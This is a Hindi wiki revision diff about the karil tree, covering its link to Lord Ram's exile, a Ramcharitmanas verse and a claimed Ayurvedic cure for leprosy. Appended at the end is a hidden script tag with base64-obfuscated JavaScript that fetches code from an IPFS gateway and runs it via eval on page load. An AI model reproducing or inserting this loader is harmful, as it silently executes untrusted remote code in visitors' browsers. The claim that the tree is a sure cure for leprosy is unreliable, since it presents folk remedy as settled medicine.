Difference between revisions of "करील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Kareel tree.JPG|[[करील वृक्ष]]|left|thumb]]
+
[[चित्र:Kareel tree.JPG|[[करील वृक्ष]]|thumb]]
 +
'''करील''' एक दुर्लभ पौराणिक वृक्ष है। [[राम|भगवान राम]] ने वनवास जाते समय करील वृक्ष के नीचे ही विश्राम किया था।
 +
*भगवान राम ने सभी सुख भोगों से वंचित रहने का प्रण लिया था, इसलिए भगवान राम ने [[फूल]], [[फल]], पत्ती विहीन इस उदासीन वृक्ष के नीचे ही विश्राम करना उचित समझा।
 +
*ग्रंथ [[रामचरितमानस]] में भी करील का वर्णन है। वन गमन के समय सीता जी को समझाते हुए भगवान राम ने कहा था-
 +
<blockquote>नव रसाल वन विहरन शीला सोह कि कोकिल विपिन करीला।</blockquote>
 +
*इस वृक्ष का आयुर्वेदिक उपयोग भी बहुत अधिक है।
 +
* कुष्ठरोग तथा अन्य चर्मरोगों में इसका उपयोग रामबाण इलाज के लिए किया जाता है|
  
*करील यह एक दुर्लभ पौराणिक वृक्ष है।
 
*[[राम|भगवान राम]] ने वन गमन के समय [[करील वृक्ष]] के नीचे विश्राम कि या था।
 
*भगवान राम सभी सुख भोगों से वंचित रहने का प्रण लिया था इसलिए भगवान राम ने फूल, फल, पत्ती विहीन इस उदासीन वृक्ष के नीचे ही विश्राम करना उचित समझा।
 
*ग्रंथ [[रामचरितमानस]] में भी करील का वर्णन है। वन गमन के समय सीता जी को समझाते हुए भगवान राम ने कहा था-नव रसाल वन विहरन शीला सोह कि कोकिल विपिन करीला।
 
*इस वृक्ष का आयुर्वेदिक उपयोग है|कुष्ठरोग तथा अन्य चर्मरोगो में इसका उपयोग रामबाण इलाज के लिए किया जाता है|
 
 
 
 
<!-- कृपया इस संदेश से ऊपर की ओर ही सम्पादन कार्य करें। ऊपर आप अपनी इच्छानुसार शीर्षक और सामग्री डाल सकते हैं -->
 
 
<!-- यदि आप सम्पादन में नये हैं तो कृपया इस संदेश से नीचे सम्पादन कार्य न करें -->
 
  
  
Line 18: Line 13:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{वृक्ष}}
 
{{वृक्ष}}
{{भारतीय संस्कृति के प्रतीक}}
 
 
[[Category:वनस्पति_विज्ञान]][[Category:वनस्पति]][[Category:वनस्पति_कोश]]
 
[[Category:वनस्पति_विज्ञान]][[Category:वनस्पति]][[Category:वनस्पति_कोश]]
 
[[Category:वृक्ष]][[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]]  
 
[[Category:वृक्ष]][[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]]  
  
 
__INDEX__
 
__INDEX__

Revision as of 07:13, 26 April 2012

[[chitr:Kareel tree.JPG|karil vriksh|thumb]] karil ek durlabh pauranik vriksh hai. bhagavan ram ne vanavas jate samay karil vriksh ke niche hi vishram kiya tha.

  • bhagavan ram ne sabhi sukh bhogoan se vanchit rahane ka pran liya tha, isalie bhagavan ram ne phool, phal, patti vihin is udasin vriksh ke niche hi vishram karana uchit samajha.
  • granth ramacharitamanas mean bhi karil ka varnan hai. van gaman ke samay sita ji ko samajhate hue bhagavan ram ne kaha tha-

nav rasal van viharan shila soh ki kokil vipin karila.

  • is vriksh ka ayurvedik upayog bhi bahut adhik hai.
  • kushtharog tatha any charmarogoan mean isaka upayog ramaban ilaj ke lie kiya jata hai|


tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>